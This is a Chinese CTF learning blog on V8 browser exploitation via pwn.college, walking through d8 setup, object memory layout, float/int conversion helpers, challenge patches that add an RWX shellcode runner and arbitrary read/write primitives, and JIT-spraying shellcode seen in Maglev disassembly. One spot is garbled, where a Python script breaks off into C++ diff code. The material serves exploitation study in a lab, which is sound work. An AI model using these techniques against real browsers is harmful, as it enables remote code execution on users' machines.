2025-12-08

ctf

从pwn.college入门浏览器安全

| 0 | 前言

总之 , 换个东西学一下了 :_(

这段时间想平复下心情 , 所以找了个难的方向了解

希望我不要什么都不擅长吧

| 1 | 简介

v8

V8是谷歌公司用C++编写的开源高性能JavaScript和WebAssembly引擎。它是Google Chrome浏览器和Node.js运行时的核心组成部分。 V8引擎的主要作用是将开发者编写的JavaScript代码编译成本地机器码，从而让计算机能够直接执行，极大地提升了代码的运行速度。

即时编译（JIT）： V8引擎在执行JavaScript代码时，会将其编译成机器码，而不是逐行解释。这使得后续的执行速度更快。
垃圾回收机制： V8能够自动管理内存，识别并回收不再使用的对象，帮助开发者避免内存泄漏问题。
跨平台能力： V8可以在多种操作系统和处理器架构上运行，包括Windows、macOS、Linux以及x64、IA-32和ARM处理器。[1]
可嵌入性： V8引擎可以轻松地嵌入到任何C++应用程序中，为其提供JavaScript脚本执行能力。[1]

d8

简单来说，d8 是V8引擎自带的一个极简的命令行工具和调试外壳。当开发者编译V8源代码后，就会生成这个 d8 可执行文件。它并不是一个独立的JavaScript引擎，而是一个轻量级的封装，让开发者可以不依赖于Chrome浏览器或Node.js等宿主环境，直接与V8引擎进行交互。

本地运行JavaScript文件：可以直接使用 d8 来执行一个 .js 文件。
调试V8引擎：开发者可以通过 d8 来测试对V8源码所做的修改。
性能分析与探索：配合不同的命令行标志，d8 可以输出V8在执行过程中的各种内部信息，如字节码、优化后的代码等。
漏洞利用研究：在V8漏洞分析和利用代码的编写和测试中，d8 是一个核心工具。

| 2 | 环境搭建

下载depot_tools

1
2
3

git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
echo 'export PATH="$HOME/depot_tools:$PATH"' >> ~/.bashrc
source ~/.bashrc

🧰 depot_tools 里有什么？

gclient：用来同步、管理 Chromium/V8 那种多仓库巨型代码树
fetch：一条命令把整套工程源码拉下来
gn：Chromium/V8 的构建配置工具
ninja：高效构建系统
一些自动化脚本（如 hooks、git 补丁命令等）

拉取源码

1
2
3

mkdir ~/v8-dev
cd ~/v8-dev
fetch v8

创建工作目录 , 并拉取v8源码(相当耗时)

以上两个步骤只需要执行一次即可

题目环境搭建

每次题目会下发的重要附件为

v8源码的git版本
patch文件

在v8的工作目录中执行以下指令

git reset --hard   # 强制切到题目要求的版本
gclient sync -D          # 强制同步所有子仓库
git apply 
- 打印堆对象内部结构

- 强行触发优化或反优化

- 访问内部 Map、ElementsKind

- 调整 inline cache 行为

- 触发断点或 crash

- 绕过 JS 层的一些安全检查

# | 3 | 基础知识
标记指针 : 在js中 , 只存在两种类型 : 数字与对象

- 对于数字 , 将其左移1位 , 使其LSB标记为0

- 对于对象 , 由于堆块向0x10对其 , 直接将其LSB标记为1

压缩指针 : 由于所有对象都被v8存放在一个cage中,高32位相同,所以表示不用的指针只需要用低32位区分就可以了

### 对象内存分布

- ### 数组

```plaintext
DebugPrint: 0x367c00042c65: [JSArray]
 - map: 0x367c001cafa5  [FastProperties]
 - prototype: 0x367c001cb219 
 - elements: 0x367c001d3695  [PACKED_SMI_ELEMENTS (COW)]
 - length: 4
 - properties: 0x367c00000725 
 - All own properties (excluding elements): {
    0x367c00000d99: [String] in ReadOnlySpace: #length: 0x367c00025fd9 , data= 0x367c00000069 > (const accessor descriptor, attrs: [W__]), location: descriptor
 }
 - elements: 0x367c001d3695  {
         0-3: 10
 }
0x367c001cafa5: [Map] in OldSpace
 - map: 0x367c001c0261 )>
 - type: JS_ARRAY_TYPE
 - instance size: 16
 - inobject properties: 0
 - unused property fields: 0
 - elements kind: PACKED_SMI_ELEMENTS
 - enum length: invalid
 - back pointer: 0x367c00000069 
 - prototype_validity cell: 0x367c00000a89 
 - instance descriptors #1: 0x367c001cb831 
 - transitions #1: 0x367c001cb84d 
   Transition array #1:
     0x367c00000e5d : (transition to HOLEY_SMI_ELEMENTS) -> 0x367c001cb865 
 - prototype: 0x367c001cb219 
 - constructor: 0x367c001caf11 
 - dependent code: 0x367c00000735 
 - construction counter: 0

在内存中的分布可以发现, 由四个成员组成

pwndbg> x/wx 0x367c00042c64
0x367c00042c64:	0x001cafa5(map)
pwndbg> 
0x367c00042c68:	0x00000725(properties)
pwndbg> 
0x367c00042c6c:	0x001d3695(elements)
pwndbg> 
0x367c00042c70:	0x00000008(lenth)

其中指针和小数都被LSB标记

1

在map中

0x367c001cafa5: [Map] in OldSpace
 - map: 0x367c001c0261 )>
 - type: JS_ARRAY_TYPE
 - instance size: 16
 - inobject properties: 0
 - unused property fields: 0
 - elements kind: PACKED_SMI_ELEMENTS
 - enum length: invalid
 - back pointer: 0x367c00000069 
 - prototype_validity cell: 0x367c00000a89 
 - instance descriptors #1: 0x367c001cb831 
 - transitions #1: 0x367c001cb84d 
   Transition array #1:
     0x367c00000e5d : (transition to HOLEY_SMI_ELEMENTS) -> 0x367c001cb865 
 - prototype: 0x367c001cb219 
 - constructor: 0x367c001caf11 
 - dependent code: 0x367c00000735 
 - construction counter: 0

对于的虚拟内存

Memory Address    Value (Hex)     Meaning (Compressed Pointer / Data)
--------------    -----------     -----------------------------------
0x367c001cafa4:   0x001c0261  --> Map (MetaMap)
0x367c001cafa8:   0x31040404  --> InstanceSize(16), Type(JS_ARRAY), ElementsKind
0x367c001cafac:   0x01000844  --> BitFields (Flags)
0x367c001cafb0:   0x0a0007ff  --> BitFields (EnumLength = Invalid)
0x367c001cafb4:   0x001cb219  --> Prototype
0x367c001cafb8:   0x001caf11  --> Constructor
0x367c001cafbc:   0x001cb831  --> Instance Descriptors
0x367c001cafc0:   0x00000735  --> Dependent Code
0x367c001cafc4:   0x00000a89  --> Prototype Validity Cell
0x367c001cafc8:   0x001cb84d  --> Transitions (or BackPointer)

2

对于properties成员

pwndbg> job 0x367c00000725
0x367c00000725: [FixedArray] in ReadOnlySpace
 - map: 0x367c0000056d 
 - length: 0

3

对于elements成员

pwndbg> x/wx 0x367c001d3695-1
0x367c001d3694:	0x0000065d
pwndbg> 
0x367c001d3698:	0x00000008
pwndbg> 
0x367c001d369c:	0x00000014
pwndbg> 
0x367c001d36a0:	0x00000014
pwndbg> 
0x367c001d36a4:	0x00000014
pwndbg> 
0x367c001d36a8:	0x00000014
pwndbg> 
0x367c001d36ac:	0x000010cd
pwndbg> 
0x367c001d36b0:	0x00000000
pwndbg> job 0x367c001d3695
0x367c001d3695: [FixedArray] in OldSpace
 - map: 0x367c0000065d 
 - length: 4
         0-3: 10

map用标记指针,lenth和members用小数存储

可以看出来这是个存放了4个元素,每个元素都是0xa的整数数组

函数对象

pwndbg> job 0x64000042c49
0x64000042c49: [Function]
 - map: 0x0640001c0a9d  [FastProperties]
 - prototype: 0x0640001c0951 
 - elements: 0x064000000725  [HOLEY_ELEMENTS]
 - function prototype: 
 - shared_info: 0x0640001d3691 
 - name: 0x064000002b09 
 - builtin: CompileLazy
 - formal_parameter_count: 0
 - kind: ArrowFunction
 - context: 0x0640001d3721 
 - code: 0x064000033331 
 - source code: () =>{return 12}
 - properties: 0x064000000725 
 - All own properties (excluding elements): {
    0x64000000d99: [String] in ReadOnlySpace: #length: 0x064000026099 , data= 0x064000000069 > (const accessor descriptor, attrs: [__C]), location: descriptor
    0x64000000dc5: [String] in ReadOnlySpace: #name: 0x064000026079 , data= 0x064000000069 > (const accessor descriptor, attrs: [__C]), location: descriptor
 }
 - feedback vector: feedback metadata is not available in SFI

3.Map相关

我们知道,obj有map成员,这个成员也是个obj,那么它自己有也map成员…那这种递归存在多少层呢?

[ 普通对象 (JSArray) ]
      | map 指针
      v
[ 普通 Map (Map A) ]
      | map 指针
      v
[ MetaMap (Map of Maps) ]  这个MetaMap存在所有map_obj中 , 而且它的压缩指针是写死的 , 我们不需要泄露任何地址便可以使用它

# | 4 | 常用函数
由于双浮点数和v8优秀的适配性,我们不得不引入这些函数

```javascript
var f64 = new Float64Array(1);
var u64 = new BigUint64Array(f64.buffer);
var u32 = new Uint32Array(f64.buffer);
//一堆转化来转化去的函数
function i2f(i){u64[0]=BigInt(i);return f64[0];}
function f2i(i){f64[0]=i;return u64[0];}
function u2f(low,hig){u32[0]=low;u32[1]=hig;return f64[0];}
function u2i(low,hig){u32[0]=low;u32[1]=hig;return u64[0];}
function f2l(i){f64[0]=i;return u32[0];}
function i2l(i){u64[0]=i;return u32[0];}
function f2h(i){f64[0]=i;return u32[1];}
function i2h(i){u64[0]=i;return u32[1];}
function bug(){%SystemBreak();}
function peek(obj){%DebugPrint(obj);}
function log(msg){console.log(msg);}

注意打远程时要把bug和peek注释掉

| 5 | pwn.college

入门的话还是从 pwn.college 开始比较好 , flyyy 师傅强力推荐 , Loora1N 师傅写的也很不错

Level 1

分析

完整的patch内容 , 只需要看有+的地方就可以了

diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index ea45a7ada6b..c840e568152 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -24,6 +24,8 @@
 #include "src/objects/prototype.h"
 #include "src/objects/smi.h"
 
+extern "C" void *mmap(void *, unsigned long, int, int, int, int);
+
 namespace v8 {
 namespace internal {
 
@@ -407,6 +409,47 @@ BUILTIN(ArrayPush) {
   return *isolate->factory()->NewNumberFromUint((new_length));
 }
 
+BUILTIN(ArrayRun) {
+  HandleScope scope(isolate);
+  Factory *factory = isolate->factory();
+  Handle receiver = args.receiver();
+
+  if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, Cast(*receiver))) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("Nope")));
+  }
+
+  Handle array = Cast(receiver);
+  ElementsKind kind = array->GetElementsKind();
+
+  if (kind != PACKED_DOUBLE_ELEMENTS) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("Need array of double numbers")));
+  }
+
+  uint32_t length = static_cast(Object::NumberValue(array->length()));
+  if (sizeof(double) * (uint64_t)length > 4096) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("array too long")));
+  }
+
+  // mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  double *mem = (double *)mmap(NULL, 4096, 7, 0x22, -1, 0);
+  if (mem == (double *)-1) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("mmap failed")));
+  }
+
+  Handle elements(Cast(array->elements()), isolate);
+  FOR_WITH_HANDLE_SCOPE(isolate, uint32_t, i = 0, i, i get_scalar(i);
+    mem[i] = x;
+  });
+
+  ((void (*)())mem)();
+  return 0;
+}
+
 namespace {
 
 V8_WARN_UNUSED_RESULT Tagged GenericArrayPop(Isolate* isolate,
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 78cbf8874ed..4f3d885cca7 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -421,6 +421,7 @@ namespace internal {
   TFJ(ArrayPrototypePop, kDontAdaptArgumentsSentinel)                          \
   /* ES6 #sec-array.prototype.push */                                          \
   CPP(ArrayPush)                                                               \
+  CPP(ArrayRun)                                                                \
   TFJ(ArrayPrototypePush, kDontAdaptArgumentsSentinel)                         \
   /* ES6 #sec-array.prototype.shift */                                         \
   CPP(ArrayShift)                                                              \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index 9a346d134b9..58fd42e59a4 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1937,6 +1937,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
       return Type::Receiver();
     case Builtin::kArrayUnshift:
       return t->cache_->kPositiveSafeInteger;
+  case Builtin::kArrayRun:
+    return Type::Receiver();
 
     // ArrayBuffer functions.
     case Builtin::kArrayBufferIsView:
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index facf0d86d79..382c015bc48 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -3364,7 +3364,7 @@ Local Shell::CreateNodeTemplates(
 
 Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
                        String::NewFromUtf8Literal(isolate, "global"));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3385,13 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   global_template->Set(isolate, "readline",
                        FunctionTemplate::New(isolate, ReadLine));
   global_template->Set(isolate, "load",
-                       FunctionTemplate::New(isolate, ExecuteFile));
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
   global_template->Set(isolate, "setTimeout",
                        FunctionTemplate::New(isolate, SetTimeout));
   // Some Emscripten-generated code tries to call 'quit', which in turn would
   // call C's exit(). This would lead to memory leaks, because there is no way
   // we can terminate cleanly then, so we need a way to hide 'quit'.
-  if (!options.omit_quit) {
+/*  if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
   global_template->Set(isolate, "testRunner",
@@ -3410,7 +3410,7 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   if (i::v8_flags.expose_async_hooks) {
     global_template->Set(isolate, "async_hooks",
                          Shell::CreateAsyncHookTemplate(isolate));
-  }
+  }*/
 
   return global_template;
 }
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index 48249695b7b..40a762c24c8 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -2533,6 +2533,8 @@ void Genesis::InitializeGlobal(Handle global_object,
 
     SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
                           true);
+    SimpleInstallFunction(isolate_, proto, "run",
+                          Builtin::kArrayRun, 0, false);
     SimpleInstallFunction(isolate_, proto, "concat",
                           Builtin::kArrayPrototypeConcat, 1, false);
     SimpleInstallFunction(isolate_, proto, "copyWithin",

主要为double_array增加了一个run方法

+BUILTIN(ArrayRun) {
+  HandleScope scope(isolate);
+  Factory *factory = isolate->factory();
+  Handle receiver = args.receiver();
+
+  if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, Cast(*receiver))) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("Nope")));
+  }
+
+  Handle array = Cast(receiver);
+  ElementsKind kind = array->GetElementsKind();
+
+  if (kind != PACKED_DOUBLE_ELEMENTS) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("Need array of double numbers")));
+  }
+
+  uint32_t length = static_cast(Object::NumberValue(array->length()));
+  if (sizeof(double) * (uint64_t)length > 4096) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("array too long")));
+  }
+
+  // mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  double *mem = (double *)mmap(NULL, 4096, 7, 0x22, -1, 0);
+  if (mem == (double *)-1) {
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+      factory->NewStringFromAsciiChecked("mmap failed")));
+  }
+
+  Handle elements(Cast(array->elements()), isolate);
+  FOR_WITH_HANDLE_SCOPE(isolate, uint32_t, i = 0, i, i get_scalar(i);
+    mem[i] = x;
+  });
+
+  ((void (*)())mem)();
+  return 0;
+}

可以使用c++的阅读方法大致理解这个方法的作用

检查数组是不是浮点数数组
检查数组的长度是小于0x1000的
mmap出一片rwx区域 , 将数组复制到rwx区域
执行这片rwx区域

总的来说就是一个v8版本的ret2shellcode

因为d8本质上也是个elf文件, 如果我们在d8的虚拟空间中执行shellcode, 使用x86的shellcode就可以了

1
2

zer00ne@zer00ne-VMware-Virtual-Platform:~/desktop/V8/src/v8/out/release$ file d8
d8: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[xxHash]=88d653a67130210a, not stripped

shellcode是由字节形成的 , 所以我们需要将shellcode的字节码转化为浮点数

可以使用一个py脚本

#!/usr/bin/env python3
from pwn import *
import struct
import sys

# 必须导入 shellcraft 模块，这样 eval() 才能找到它
from pwnlib.shellcraft import *

def main():
    # 检查是否提供了命令行参数
    if len(sys.argv) & info) {
+  v8::Isolate* isolate = info.GetIsolate();
+
+  if (info.Length() == 0) {
+    isolate->ThrowError("First argument must be provided");
+    return;
+  }
+
+  internal::Handle arg = Utils::OpenHandle(*info[0]);
+  if (!IsHeapObject(*arg)) {
+    isolate->ThrowError("First argument must be a HeapObject");
+    return;
+  }
+  internal::Tagged obj = internal::Cast(*arg);
+
+  uint32_t address = static_cast(obj->address());
+  info.GetReturnValue().Set(v8::Integer::NewFromUnsigned(isolate, address));
+}
+
+void Shell::ArbRead32(const v8::FunctionCallbackInfo& info) {
+	Isolate *isolate = info.GetIsolate();
+	if (info.Length() != 1) {
+		isolate->ThrowError("Need exactly one argument");
+		return;
+	}
+	internal::Handle arg = Utils::OpenHandle(*info[0]);
+	if (!IsNumber(*arg)) {
+		isolate->ThrowError("Argument should be a number");
+		return;
+	}
+	internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
+	internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
+	uint32_t addr = static_cast(internal::Object::NumberValue(*arg));
+	uint64_t full_addr = base_addr + (uint64_t)addr;
+	uint32_t result = *(uint32_t *)full_addr;
+	info.GetReturnValue().Set(v8::Integer::NewFromUnsigned(isolate, result));
+}
+
+void Shell::ArbWrite32(const v8::FunctionCallbackInfo& info) {
+	Isolate *isolate = info.GetIsolate();
+	if (info.Length() != 2) {
+		isolate->ThrowError("Need exactly 2 arguments");
+		return;
+	}
+	internal::Handle arg1 = Utils::OpenHandle(*info[0]);
+	internal::Handle arg2 = Utils::OpenHandle(*info[1]);
+	if (!IsNumber(*arg1) || !IsNumber(*arg2)) {
+		isolate->ThrowError("Arguments should be numbers");
+		return;
+	}
+	internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
+	internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
+	uint32_t addr = static_cast(internal::Object::NumberValue(*arg1));
+	uint32_t value = static_cast(internal::Object::NumberValue(*arg2));
+	uint64_t full_addr = base_addr + (uint64_t)addr;
+	*(uint32_t *)full_addr = value;
+}
+
 void Shell::ModuleResolutionSuccessCallback(
     const FunctionCallbackInfo& info) {
   DCHECK(i::ValidateCallbackInfo(info));
@@ -3364,7 +3422,13 @@ Local Shell::CreateNodeTemplates(
 
 Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
+  global_template->Set(isolate, "GetAddressOf",
+                       FunctionTemplate::New(isolate, GetAddressOf));
+  global_template->Set(isolate, "ArbRead32",
+                       FunctionTemplate::New(isolate, ArbRead32));
+  global_template->Set(isolate, "ArbWrite32",
+                       FunctionTemplate::New(isolate, ArbWrite32));
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
                        String::NewFromUtf8Literal(isolate, "global"));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3449,13 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   global_template->Set(isolate, "readline",
                        FunctionTemplate::New(isolate, ReadLine));
   global_template->Set(isolate, "load",
-                       FunctionTemplate::New(isolate, ExecuteFile));
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
   global_template->Set(isolate, "setTimeout",
                        FunctionTemplate::New(isolate, SetTimeout));
   // Some Emscripten-generated code tries to call 'quit', which in turn would
   // call C's exit(). This would lead to memory leaks, because there is no way
   // we can terminate cleanly then, so we need a way to hide 'quit'.
-  if (!options.omit_quit) {
+/*  if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
   global_template->Set(isolate, "testRunner",
@@ -3410,7 +3474,7 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   if (i::v8_flags.expose_async_hooks) {
     global_template->Set(isolate, "async_hooks",
                          Shell::CreateAsyncHookTemplate(isolate));
-  }
+  }*/
 
   return global_template;
 }
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a19d4a0eae4..476675a7150 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -507,6 +507,9 @@ class Shell : public i::AllStatic {
   };
   enum class CodeType { kFileName, kString, kFunction, kInvalid, kNone };
 
+  static void GetAddressOf(const v8::FunctionCallbackInfo& args);
+  static void ArbRead32(const v8::FunctionCallbackInfo& args);
+  static void ArbWrite32(const v8::FunctionCallbackInfo& args);
   static bool ExecuteString(Isolate* isolate, Local source,
                             Local name,
                             ReportExceptions report_exceptions,

添加了GetAddressOf , ArbRead32 , ArbWrite32 三个函数

这是三个v8中重要的原语 , 获取obj地址/任意地址读写

GetAddressOf

+void Shell::GetAddressOf(const v8::FunctionCallbackInfo& info) {
+  v8::Isolate* isolate = info.GetIsolate();
+
+  if (info.Length() == 0) {
+    isolate->ThrowError("First argument must be provided");
+    return;
+  }
+
+  internal::Handle arg = Utils::OpenHandle(*info[0]);
+  if (!IsHeapObject(*arg)) {
+    isolate->ThrowError("First argument must be a HeapObject");
+    return;
+  }
+  internal::Tagged obj = internal::Cast(*arg);
+
+  uint32_t address = static_cast(obj->address());
+  info.GetReturnValue().Set(v8::Integer::NewFromUnsigned(isolate, address));
+}

先是检查参数是否是堆上obj

然后获取obj的地址并使用u32进行截断得到obj的压缩指针返回给

也就是获得obj的压缩指针

ArbRead32

+void Shell::ArbRead32(const v8::FunctionCallbackInfo& info) {
+	Isolate *isolate = info.GetIsolate();
+	if (info.Length() != 1) {
+		isolate->ThrowError("Need exactly one argument");
+		return;
+	}
+	internal::Handle arg = Utils::OpenHandle(*info[0]);
+	if (!IsNumber(*arg)) {
+		isolate->ThrowError("Argument should be a number");
+		return;
+	}
+	internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
+	internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
+	uint32_t addr = static_cast(internal::Object::NumberValue(*arg));
+	uint64_t full_addr = base_addr + (uint64_t)addr;
+	uint32_t result = *(uint32_t *)full_addr;
+	info.GetReturnValue().Set(v8::Integer::NewFromUnsigned(isolate, result));
+}

检查参数是否是一个数字, 然后获取cage_base(也就是GetAddressOf截断的那部分数值)并加在参数上

最后将结果转化为u32指针并解引用 , 把内容返还给用户

也就是任意地址读, 参数为一个压缩指针

ArbWrite32

+void Shell::ArbWrite32(const v8::FunctionCallbackInfo& info) {
+	Isolate *isolate = info.GetIsolate();
+	if (info.Length() != 2) {
+		isolate->ThrowError("Need exactly 2 arguments");
+		return;
+	}
+	internal::Handle arg1 = Utils::OpenHandle(*info[0]);
+	internal::Handle arg2 = Utils::OpenHandle(*info[1]);
+	if (!IsNumber(*arg1) || !IsNumber(*arg2)) {
+		isolate->ThrowError("Arguments should be numbers");
+		return;
+	}
+	internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
+	internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
+	uint32_t addr = static_cast(internal::Object::NumberValue(*arg1));
+	uint32_t value = static_cast(internal::Object::NumberValue(*arg2));
+	uint64_t full_addr = base_addr + (uint64_t)addr;
+	*(uint32_t *)full_addr = value;
+}

需要两个参数, 都是数字

将一参加上cage_base后解引用 , 然后将二参赋值给刚刚的结果

也就是向任意压缩指针内写入任意u32数值

jit喷洒

从这里开始我们就没有现成的rwx区域了

我们需要欺骗d8让它将我们自己写的函数转化为rwx区域内的机器码

然后使用jop将简短的shellcode连接最终rce

jit喷洒 : https://www.matteomalvica.com/blog/2024/06/05/intro-v8-exploitation-maglev/#jit-spraying-shellcode

可以看到我们的第一个gadget位于rwx+0x6b的位置

pwndbg> job 0x366b002c00a5
0x366b002c00a5: [Code]
 - map: 0x366b00000d61 
 - kind: MAGLEV
 - deoptimization_data_or_interpreter_data: 0x366b002c0011 
 - position_table: 0x366b00180011 
 - instruction_stream: 0x5555b79c0031 
 - instruction_start: 0x5555b79c0040
 - is_turbofanned: 0
 - stack_slots: 5
 - marked_for_deoptimization: 0
 - embedded_objects_cleared: 0
 - can_have_weak_objects: 1
 - instruction_size: 392
 - metadata_size: 40
 - inlined_bytecode_size: 0
 - osr_offset: -1
 - handler_table_offset: 40
 - unwinding_info_offset: 40
 - code_comments_offset: 40
 - instruction_stream.relocation_info: 0x366b002c0089 
 - instruction_stream.body_size: 432

--- Disassembly: ---
kind = MAGLEV
stack_slots = 5
compiler = maglev
address = 0x366b002c00a5

Instructions (size = 392)
0x5555b79c0040     0  8b59f4               movl rbx,[rcx-0xc]
0x5555b79c0043     3  4903de               REX.W addq rbx,r14
0x5555b79c0046     6  f6431e20             testb [rbx+0x1e],0x20
0x5555b79c004a     a  0f85b09d00a0         jnz 0x5555579c9e00  (CompileLazyDeoptimizedCode)    ;; near builtin entry
0x5555b79c0050    10  49b9c1421d006b360000 REX.W movq r9,0x366b001d42c1    ;; object: 0x366b001d42c1 
0x5555b79c005a    1a  41f6410d2e           testb [r9+0xd],0x2e
0x5555b79c005f    1f  0f855b9800a0         jnz 0x5555579c98c0  (MaglevOptimizeCodeOrTailCallOptimizedCodeSlot)    ;; near builtin entry
0x5555b79c0065    25  55                   push rbp
0x5555b79c0066    26  4889e5               REX.W movq rbp,rsp
0x5555b79c0069    29  56                   push rsi
0x5555b79c006a    2a  57                   push rdi
0x5555b79c006b    2b  50                   push rax
0x5555b79c006c    2c  493b65a0             REX.W cmpq rsp,[r13-0x60] (external value (StackGuard::address_of_jslimit()))
0x5555b79c0070    30  730a                 jnc 0x5555b79c007c  
0x5555b79c0072    32  b8b0010000           movl rax,0x1b0
0x5555b79c0077    37  e8c49700a0           call 0x5555579c9840  (MaglevFunctionEntryStackCheck_WithoutNewTarget)    ;; near builtin entry
0x5555b79c007c    3c  498b7d48             REX.W movq rdi,[r13+0x48] (external value (Heap::NewSpaceAllocationTopAddress()))
0x5555b79c0080    40  4c8d5750             REX.W leaq r10,[rdi+0x50]
0x5555b79c0084    44  4d3b5550             REX.W cmpq r10,[r13+0x50] (external value (Heap::NewSpaceAllocationLimitAddress()))
0x5555b79c0088    48  0f83fe000000         jnc 0x5555b79c018c  
0x5555b79c008e    4e  4d895548             REX.W movq [r13+0x48] (external value (Heap::NewSpaceAllocationTopAddress())),r10
0x5555b79c0092    52  4883c701             REX.W addq rdi,0x1
0x5555b79c0096    56  488bc7               REX.W movq rax,rdi
0x5555b79c0099    59  b9a9080000           movl rcx,0x8a9    ;; (compressed) object: 0x366b000008a9 
0x5555b79c009e    5e  894fff               movl [rdi-0x1],rcx
0x5555b79c00a1    61  b90e000000           movl rcx,0xe
0x5555b79c00a6    66  894f03               movl [rdi+0x3],rcx
0x5555b79c00a9    69  49ba4831d24831f6eb0c REX.W movq r10,0xcebf63148d23148
0x5555b79c00b3    73  c4c1f96ec2           vmovq xmm0,r10
0x5555b79c00b8    78  c5fb114707           vmovsd [rdi+0x7],xmm0
0x5555b79c00bd    7d  49bab86c61670090eb0c REX.W movq r10,0xceb900067616cb8
0x5555b79c00c7    87  c4c1f96ec2           vmovq xmm0,r10
0x5555b79c00cc    8c  c5fb11470f           vmovsd [rdi+0xf],xmm0
0x5555b79c00d1    91  49ba48c1e0209090eb0c REX.W movq r10,0xceb909020e0c148
0x5555b79c00db    9b  c4c1f96ec2           vmovq xmm0,r10
0x5555b79c00e0    a0  c5fb114717           vmovsd [rdi+0x17],xmm0
0x5555b79c00e5    a5  49babb6361746690eb0c REX.W movq r10,0xceb9066746163bb
0x5555b79c00ef    af  c4c1f96ec2           vmovq xmm0,r10
0x5555b79c00f4    b4  c5fb11471f           vmovsd [rdi+0x1f],xmm0
0x5555b79c00f9    b9  49ba4809d8509090eb0c REX.W movq r10,0xceb909050d80948
0x5555b79c0103    c3  c4c1f96ec2           vmovq xmm0,r10
0x5555b79c0108    c8  c5fb114727           vmovsd [rdi+0x27],xmm0
0x5555b79c010d    cd  49ba4889e7909090eb0c REX.W movq r10,0xceb909090e78948
0x5555b79c0117    d7  c4c1f96ec2           vmovq xmm0,r10
0x5555b79c011c    dc  c5fb11472f           vmovsd [rdi+0x2f],xmm0
0x5555b79c0121    e1  49ba6a3b580f05cccccc REX.W movq r10,0xcccccc050f583b6a
0x5555b79c012b    eb  c4c1f96ec2           vmovq xmm0,r10
0x5555b79c0130    f0  c5fb114737           vmovsd [rdi+0x37],xmm0
0x5555b79c0135    f5  488d5040             REX.W leaq rdx,[rax+0x40]
0x5555b79c0139    f9  488bc7               REX.W movq rax,rdi
0x5555b79c013c    fc  488bfa               REX.W movq rdi,rdx
0x5555b79c013f    ff  bb21b81c00           movl rbx,0x1cb821    ;; (compressed) object: 0x366b001cb821 
0x5555b79c0144   104  895fff               movl [rdi-0x1],rbx
0x5555b79c0147   107  498d9e25070000       REX.W leaq rbx,[r14+0x725]
